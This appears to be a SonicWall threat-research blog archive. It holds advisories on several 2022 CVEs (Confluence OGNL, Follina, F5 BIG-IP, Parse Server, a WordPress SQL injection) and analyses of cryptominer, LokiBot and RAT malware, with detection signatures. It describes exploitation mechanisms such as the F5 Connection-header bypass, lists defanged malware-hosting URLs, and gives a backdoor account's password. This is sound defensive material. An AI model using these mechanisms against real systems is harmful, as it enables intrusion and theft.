Posts

Atlassian Confluence OGNL Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  Atlassian Confluence is a collaboration platform that allows you to build a knowledge base for documentation, product requirements, create, collaborate, comment on pages, project plans, share information between teams, and the entire company. It is written primarily in Java and runs on a bundled Apache Tomcat application server.

  An OGNL injection has been reported in the Atlassian Confluence Server and Data Center. The vulnerability is due to insufficient input validation leading to OGNL evaluation of user-supplied input.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation can result in remote code execution under the security context of the affected server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-26134.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Confluence uses the Webwork web application framework to map URLs to Java classes, creating what is known as an “action”. Action URLs end with the “.action” suffix and are defined in the xwork.xml file in confluence-.jar and in the atlassian-plugin.xml file in JAR files of included plugins.

  Each action entry contains at least a name attribute, defining the action name, a class attribute, defining the Java class implementing the action, and at least one result element which decides the Velocity template to render after the action is invoked based on the result of the action. Common return values from actions are “error”, “input”, and “success”, but any value may be used as long as there is a matching result element in the associated XWork XML.

  Action entries can contain a method attribute, which allows invocation of a specific method of the specified Java class. When no command is specified, the doDefault() method of the action class is called.

  The following is a sample action entry for the doenterpagevariables action:

  In the above example, the doEnter() method of the com.atlassian.confluence.pages.actions.PageVariablesAction class handles requests to “doenterpagevariables.action” and will return values such as “success”, “input”, or “error”, resulting in the appropriate velocity template being rendered. Request-URI paths that end in a slash are set to use “index.action”.

  The vulnerability is due to insufficient validation of user input that is evaluated during Result calculation. As part of action processing, the action namespace is parsed from the Request-URI path from the start until the last slash. When processing the result of a request in the result class ActionChainResult, the namespace is checked for OGNL expressions and evaluated if found. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request with an OGNL expression in the Request-URI to the target server.

Triggering the Problem:

  • The target must have the vulnerable software installed and running.
  • The attacker must have network connectivity to the target service.

Triggering Conditions:

  The attacker sends a malicious HTTP request to the target server with a malicious Request-URI path. The vulnerability is triggered while processing the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2801 Confluence Server and Data Center OGNL Injection RCE 1
  • IPS: 2804 Confluence Server and Data Center OGNL Injection RCE 2
  • IPS: 2806 Confluence Server and Data Center OGNL Injection RCE 3
  • IPS: 2809 Confluence Server and Data Center OGNL Injection RCE 4
  • IPS: 2813 Confluence Server and Data Center OGNL Injection RCE 5

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detect and filter malicious traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

A look at TeamTNT's latest variant being actively used in the wild

/in /by

The SonicWall Capture Labs threat research team analyzed the latest cryptomining and infostealing Trojan from a well-known malware group called TeamTNT. They are known to target vulnerable *nix systems and would deploy cryptominer and a myriad of other tools for reconnaissance and infostealing.

Infection Cycle:

The sample comes as a bash script. To establish a clean slate, upon execution it calls a function that will find, kill and remove all running cryptomining services.

Also while getting rid of cryptominers, it adds another bash script as a lock file which when executed will echo and read “Forbidden Action!!! TeamTNT is watching you.”

It then sets up its own cryptominer by downloading and installing XMrig, an open source Monero miner.

Upon setup and execution of the cryptominer, a TeamTNT-branded greeting is shown.

It then runs another function called makesshaxx to set up SSH key which then allows TeamTNT to securely access the victim machine over an unsecured network.

It then deploys an open source rootkit called Diamorphine which it uses to hide itself.

It begins as a base64 encoded tar file.

Which is then decoded, decompressed, built and installed.

And then finally executed by running the command “insmod diamorphine.ko

It also locks up the system and ensures full control by deleting cronjobs and locking cron.

It also redirects standard output and errors to null when the victim tries to shutdown or reboot the system.

And finally it has a function that uses another open source tool called, punk.py which is an SSH post-exploitation tool that is used to collect usernames, ssh keys and known hosts from a unix system, then tries to connect via ssh to all the combinations found.

The python script is hidden as a base64 encoded value.

But once decoded reveals the punk.py tool.

Sonicwall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by Sonicwall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Follina MS-MSDT RCE Vulnerability

/in /by

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  CVE-2022-30190 a.k.a Follina, The Microsoft Office zero-day vulnerability allows applications like Microsoft Word to execute code (without macros) by calling MSDT (Microsoft Support Diagnostic Tool) routines using the “ms-msdt:/” protocol. It was noticed as a zero-day being exploited in the wild, but was first mentioned in 2020 in a rather interesting Bachelor’s Thesis by Benjamin Altpeter August 01st, 2020.

  The text (Bachelor’s Thesis) contains other ways to execute code via MS Protocol in Word, using templates, which still work today. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.

  Bachelor’s Thesis & MSDT

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-30190.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 7.3 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:F/RL:T/RC:C).

  Base score is 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/), based on the following metrics:
    • Attack vector is local.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is required.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 7.3 (E:F/RL:T/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is temporary fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The exploit works as follows: The user opens a non-malicious Microsoft Office file (Word, Excel, RTF, …) referencing a malicious remote HTML template file. The remote file is downloaded and the embedded payload is executed, containing code to abuse the ms-msdt protocol, and invoke actions on the compromised host. Look at “Target=” search “RDF842” below:

  
  The host, www[.]xmlformats[.]com, will be visited when you open the document (and activate the content). The following payload will be fetched:

  
  Analyzing the right side of the variable “windows.location.href”. The protocol “ms-msdt:/“ is being used. MSDT (Microsoft Support Diagnostic Tool) or msdt.exe is a tool provided by Microsoft that will collect information to send to Microsoft Support. Microsoft Office will automatically process the MSDT query and execute the payload. The Base64 encoding from above contains the following:

  

  IOC: 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784.

Triggering the Problem:

  • The target system must have the vulnerable Microsoft Office application installed and running.
  • The attacker must have network connectivity to the affected ports.
  • The vulnerability does not work with older Microsoft Office versions.

Triggering Conditions:

  The attacker sends a generated clickme.docx (or clickme.rtf) payload to the victim by www/exploit.html. The vulnerability is triggered when the user clicks on the file.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS
    • SMTP
    • POP3
    • IMAP

SonicWall, provides the following protection against this threat:

  This threat is proactively detected by Capture ATP w/RTDMI.

  • IPS: 2771 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2772 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2773 Microsoft Support Diagnostic Tool RCE (Follina)
  • IPS: 2774 Microsoft Support Diagnostic Tool RCE (Follina)
  • GAV: CVE-2022-30190.X
  • GAV: CVE-2022-30190.X_1
  • GAV: CVE-2022-30190.X_2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product or apply the vendor supplied patch.
    • Filtering attack traffic using the signatures above.
    • Follow the Microsoft Guidance for CVE-2022-30190 below.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory #1 & Vendor Advisory #2

WordPress Photo Gallery Plugin SQL Injection Vulnerability

/in /by

Overview:

  WordPress is an open source, PHP-based Content Management System (CMS) that offers several features such as multiple users, editing, custom formatting of text and an architecture which supports plugins to further extend its functionality. Looking into the Photo Gallery plugin by 10Web. The plugin has 300,000 plus active installations. The plugin offers features to add responsive mobile-friendly photo galleries and albums to your xmlpost content.

  A SQL injection vulnerability has been reported for the Photo Gallery plugin for WordPress. This vulnerability is due to improper input validation for the filter_tag parameter.

  A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. A successful attack may result in remote SQL command execution against the database on the target server.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-1281.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to the insufficient sanitization of the filter_tag parameter in the request to /wp-admin/admin-ajax.php when the action parameter is set to GalleryBox. When a request with action=GalleryBox is received by the server; the function get_image_rows_data() from photo-gallery/frontend/models/BWGModelGalleryBox.php is called. The function get_image_rows_data() checks for the presence of the filter_tag parameter. If the filter_tag parameter is present; then it parses each tag and stores the result into an array. This array of tags is used in the construction of the “where clause” SQL query. This SQL query is then executed using the wpdb->get_results() function to get an array of images. As a result, a maliciously crafted request with filter_tag parameter can be used to perform an SQL injection attack and extract sensitive information from the underlying database.

Triggering the Problem:

  • The target system must have the vulnerable WordPress plugin installed and running.
  • The attacker must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker sends a crafted HTTP request to the vulnerable server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2762 WordPress Photo Gallery plugin SQL Injection 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product or apply the vendor supplied patch.
    • Filtering attack traffic using the signature above.
  The vendor has released the following patch regarding this vulnerability:
  Vendor Advisory

Malicious Linux scripts disable security and install Crypto mining software

/in /by

The SonicWall Capture Labs threat research team have read reports of a set of malicious scripts, still live online at the time of writing, that install crypto mining software on Linux servers. There are 3 scripts: fczyo, alduro and sesa.txt. Each script is responsible for different aspects of getting the mining software up and running. They make every effort to disable various security features that may be present on the system. They also configure a backdoor for access by its operators at a later time.

 

The following web addresses host the scripts and are still live at the time of writing this alert:

  • hxxp://alpenforelle.eu/fczyo
  • hxxp://alpenforelle.eu/alduro
  • hxxp://alpenforelle.eu/sesa.txt

 

fczyo [Detected as: GAV: Linux.Downloader.A (Trojan)] has the following header:

 

fczyo is the main downloader script. It installs itself and the 2 other scripts to cron under the current user and root:

 

The contents of /opt/.k/key.txt are sent to a remote server on port 1337 if the file exists. It also logs the public ip of the infected server to iplogger.org and downloads a file named “ok“, an ethereum crypto miner [Detected as: Linux.EthMiner.N (Trojan)]:

 

The mining software is made executable and the binary is run. Its output and status are logged to remote servers:

 

The alduro script [Detected as: GAV: Linux.Downloader.A (Trojan)] adds a user named “system” with password “3PvxD3qO8Hx1c” and gives it superuser priviledges. It also allows root access via ssh. This is usually disabled by default on most Linux distributions for security purposes:

 

It installs a public key and sets the appropriate permissions. This enables passwordless authentication when login in over ssh.

 

The script downloads adnckil [Detected as: GAV: Linux.BitcoinMiner.A (Trojan)]. This is Bitcoin mining software. Upon successful download, execution permissions are set and the mining software is run.

 

The job of sesa.txt is to disable various security features that may be present on the system. It disables outgoing network connections to services related to Alibaba cloud security via the hosts file:

 

If the Alibaba Cloud Aliyun service is running, it is terminated and uninstalled:

 

Any network connections related to these services are severed:

 

apparmor and aliyun services are permanently disabled:

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Linux.BitcoinMiner.A (Trojan)
  • GAV: Linux.Downloader.A (Trojan)
  • GAV: Linux.EthMiner.N (Trojan)
  • GAV: Linux.Mirai.N_1 (Trojan)

LokiBot is using Living Off The Land Technique

/in /by

The malware authors always look how they can keep the malware stay hidden from various security vendors, either by innovating new techniques or techniques which are already being used by some other malware authors. SonicWall threat research team has observed LokiBot is being delivered to the victim’s machine using a Windows Script File for last few weeks. The script file contains a large junk data with malicious code which executes PowerShell script to download malicious VBS script into temp folder. The VBS script is then executed and temp directory is cleaned up to remove malicious traces:

 

The VBS script is highly obfuscated which executes a PowerShell script with obfuscated arguments:

 

The PowerShell script argument contains a loader binary and a URL. The loaded binary is executed by passing the URL as an argument :

 

The loader Dynamic Link Library(DLL) is a .NET compiled binary and code is pretty simple and tiny. The loader is responsible for loading the Loki-Bot binary and if some how initial VBS script execution has failed it will execute it again. It checks for the files with “.vbs” extension in Windows temp folder, if the files are present then the loader copy the VBS script into done.vbs and executes it:

 

The loader code contains many reverse operations to provide an extra layer of protection against security vendors. The loader downloads data from a reversed URL, which is reversed and few non ascii characters are replaced with “A” to get a Dot Net dynamic link library file.

The loader now reverses the argument URL to download  and execute the LokiBot binary:

 

LokiBot is known for stealing credentials from various applications installed on victim’s machine. it communicates with its Command and Control (C&C) server to perform various task on the victim’s machine.

The file is detected by only a few security vendors on popular threat intelligence sharing portal VirusTotal at the time of writing this blog, this indicates its spreading potential:

 

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

 

 

 

F5 BIG-IP iControl REST Authentication Bypass

/in /by

BIG-IP
F5’s BIG-IP is a product family consisting of software, hardware, and virtual appliances designed around application availability, access control, and security solutions. BIG-IP software products run on top of F5’s Traffic Management Operation System® (TMOS), designed specifically to inspect network and application traffic and make real-time decisions based on the configurations given. BIG-IP Configuration Utility is a Web GUI that allows F5 users to set up the BIG-IP product and to make additional changes.

Vulnerability| CVE-2022-1388
BIG-IP iControl is a REST API for BIG-IP, which is accessible over HTTPS on port 443/TCP via the following

URL:https://<host>/mgmt/tm/

An authentication bypass vulnerability exists in BIG-IP. The vulnerability is due to insufficient validation of the Connection header field. By including “X-F5-Auth-Token” in the Connection header, the forwarded request will omit the authentication token header leading to authentication bypass. Requests can be made to the endpoint “/mgmt/tm/util/bash” to execute  shell commands.
In the following example, an attacker sends the following unauthenticated POST request

and receives following response :

As seen in the example the attacker is able to successfully run the ‘id’ command on the vulnerable machine. A remote attacker can exploit the vulnerability by sending a malicious request to the target server. This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. Successful exploitation could result in the execution of arbitrary commands under the security context of root.

Following versions are vulnerable:

  • 16.1.0 – 16.1.2
  • 15.1.0 – 15.1.5
  • 14.1.0 – 14.1.4
  • 13.1.0 – 13.1.4
  • 12.1.0 – 12.1.6
  • 11.6.1 – 11.6.5

This vulnerability is patched . The vendor advisory is here

SonicWall Capture Labs provides protection against this threat via following signatures:

  • IPS 15029:F5 BIG-IP iControl REST Authentication Bypass To RCE

Threat Graph

Microsoft Security Bulletin Coverage for May 2022

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2022. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2022-22017 Remote Desktop Client Remote Code Execution Vulnerability
ASPY 323:Malformed-File exe.MP_253

CVE-2022-23270 Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
IPS 2715:Malformed PPTP Request 3

CVE-2022-23279 Windows ALPC Elevation of Privilege Vulnerability
ASPY 324:Malformed-File exe.MP_254

CVE-2022-26925 Windows LSA Spoofing Vulnerability
IPS 15756:Windows LSA Spoofing (CVE-2022-26925)

CVE-2022-26937 Windows Network File System Remote Code Execution Vulnerability
IPS 15585:Windows NFS Remote Code Execution (CVE-2022-26937)

CVE-2022-29104 Windows Print Spooler Elevation of Privilege Vulnerability
ASPY 326:Malformed-File exe.MP_256

CVE-2022-29142 Windows Kernel Elevation of Privilege Vulnerability
ASPY 325:Malformed-File exe.MP_255

The following vulnerabilities do not have exploits in the wild :
CVE-2022-21972 Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-21978 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22011 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22012 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22013 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22014 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22015 Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-22016 Windows PlayToManager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-22019 Remote Procedure Call Runtime Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-22713 Windows Hyper-V Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-23267 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-24466 Windows Hyper-V Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-26913 Windows Authentication Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-26923 Active Directory Domain Services Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26926 Windows Address Book Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-26927 Windows Graphics Component Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-26930 Windows Remote Access Connection Manager Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26931 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26932 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26933 Windows NTFS Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26934 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26935 Windows WLAN AutoConfig Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26936 Windows Server Service Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-26938 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26939 Storage Spaces Direct Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-26940 Remote Desktop Protocol Client Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29102 Windows Failover Cluster Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29103 Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29105 Microsoft Windows Media Foundation Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29106 Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29107 Microsoft Office Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-29108 Microsoft SharePoint Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29109 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29110 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29112 Windows Graphics Component Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29113 Windows Digital Media Receiver Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29114 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29115 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29116 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29117 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29120 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29121 Windows WLAN AutoConfig Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29122 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29123 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29125 Windows Push Notifications Apps Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29126 Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29127 BitLocker Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2022-29128 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29129 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29130 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29131 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29132 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29133 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29134 Windows Clustered Shared Volume Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29135 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29137 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29138 Windows Clustered Shared Volume Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29139 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29140 Windows Print Spooler Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2022-29141 Windows LDAP Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29145 .NET and Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-29148 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-29150 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29151 Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2022-29972 Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver
There are no known exploits in the wild.
CVE-2022-30129 Visual Studio Code Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2022-30130 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2022-30138 Windows Print Spooler Elevation of Privilege Vulnerability
There are no known exploits in the wild.

Parse Server DatabaseController RCE Vulnerability

/in /by

Overview:

  Parse platform, provides SDKs for various environments (Android, iOS, PHP, .NET, …) as well as managed cloud data storage. When creating mobile apps a lot of the development time goes into managing and scaling the data backend, and building out user authentication, push notifications, and/or social media integration. Parse SDKs and cloud storage allow mobile app developers to quickly build functionality and focus efforts on user facing features.

  Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js:
    • Parse Server uses MongoDB or PostgreSQL as a database.
    • You can deploy and run Parse Server on your own infrastructure.
    • You can develop and test your app locally using Node.

  A prototype pollution vulnerability has been reported in Parse Server. This vulnerability is due to improper input validation for the DatabaseController.

  A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result, in the worst case, in remote code execution.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-24760.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  A remote unauthenticated attacker uses this exploit to inject properties in Object.prototype, or modify existing ones. Successful exploitation could result in; denial of service as the software encounters objects with unexpected properties, or properties with unexpected values. In the worst case it could lead to the execution of arbitrary code on the target server.

  An attacker could for instance leverage the prototype pollution vulnerability to unlock a code path in the Node.js BSON module which evaluates arbitrary Javascript code. MongoDB uses the BSON format for storing data internally, and over the network. The name “BSON” is based on the term JSON and stands for “Binary JSON”. It is a binary form for representing simple or complex data structures, including associative arrays (also known as name-value pairs), integer indexed arrays, and a suite of fundamental scalar types. The BSON format also includes a Code data type to store Javascript code. You can store such an object in Parse Server by sending the following HTTP request:

  When the object is later retrieved from Parse Server via an HTTP GET request, it is deserialize by the function deserializeObject() in lib/bson/parser/deserializer.js from Node.js BSON module. When encountering a Code data type the function takes one of two code paths, depending on the value of the boolean options[‘evalFunctions’]. By default this property is undefined and the function returns a string containing the Javascript code; however if options[‘evalFunctions’] is true, the function evaluates the Javascript code and return its result. By polluting Parse Server and injecting the property Object.prototype.evalFunctions an attacker may unlock the second code path and gain code execution on the server.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker first stores a crafted object in the target server. The attacker then updates the object using an update operator. The vulnerability is triggered when the target server processes the update request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2653 Parse Server Prototype Pollution RCE

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking the affected ports from external network access if they are not required.
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Mental health survey drops a Remote Access Trojan

/in /by

This week the Sonicwall Capture Labs Research team has come across a malicious document template which delivered a remote access Trojan to unsuspecting victims. It guises as a mental health survey which silently drops a RAT in the background.

 

Infection Cycle:

The file comes as a Microsoft Word template file with a dotm extension. Once opened in word it displays a seemingly benign survey on mental health.

It creates a file in the following directory:

  • /ProgramData/C0E2/RingBell.zip     [Detected as: Crimson.RAT]

It then executes the aforementioned file which performed malicious behaviors.

It spawns a legitimate application fondue.exe to perform the system reconnaissance.

Such as checking the computer name –

And finding out system languages –

And checks for numerous security settings if available in the system.

There was no network activity observed during the analysis however the Trojan has a hardcoded C&C server its strings.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Malagent.APT (Trojan)
  • GAV: Crimson.RAT (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.